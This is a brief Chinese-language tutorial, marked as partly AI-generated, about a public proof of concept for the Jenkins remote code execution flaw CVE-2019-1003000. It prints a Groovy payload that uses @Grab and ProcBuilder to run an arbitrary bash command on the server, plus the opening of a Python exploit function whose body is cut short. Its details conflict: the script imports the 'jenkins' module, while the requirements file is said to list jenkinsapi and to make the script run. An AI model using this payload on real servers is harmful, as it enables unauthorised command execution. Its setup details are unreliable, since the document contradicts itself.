Jenkins RCE PoC 项目教程
1. 项目的目录结构及介绍
cve-2019-1003000-jenkins-rce-poc/
├── sample-vuln/
│ ├── gitignore
│ ├── LICENSE
│ ├── README.md
│ ├── exploit.py
│ └── requirements.txt
- sample-vuln/: 包含漏洞利用示例的目录。
- gitignore: Git 忽略文件配置。
- LICENSE: 项目许可证文件。
- README.md: 项目说明文档。
- exploit.py: 漏洞利用脚本。
- requirements.txt: 项目依赖文件。
2. 项目的启动文件介绍
项目的启动文件是 exploit.py
,这是一个 Python 脚本,用于演示 Jenkins RCE 漏洞的利用。以下是该文件的关键部分:
import argparse
import jenkins
import time
from xml.etree import ElementTree
payload = '''
import org.buildobjects.process.ProcBuilder
@Grab('org.buildobjects:jproc:2.2.3')
class Dummy { }
print new ProcBuilder("/bin/bash").withArgs("-c", "%s").run().getOutputString()
'''
def run_command(url, cmd, job_name, username, password):
print('[*] Connecting to Jenkins')
server = jenkins.Jenkins(url, username=username, password=password)
# 漏洞利用代码
该脚本通过连接到 Jenkins 服务器并执行恶意命令来演示 RCE 漏洞的利用。
3. 项目的配置文件介绍
项目的配置文件主要是 requirements.txt
,它列出了运行 exploit.py
脚本所需的 Python 依赖包:
jenkinsapi==0.3.10
这个文件指定了 jenkinsapi
库的版本,确保脚本能够正确运行。
以上是基于开源项目 https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc.git
的教程,涵盖了项目的目录结构、启动文件和配置文件的介绍。
创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考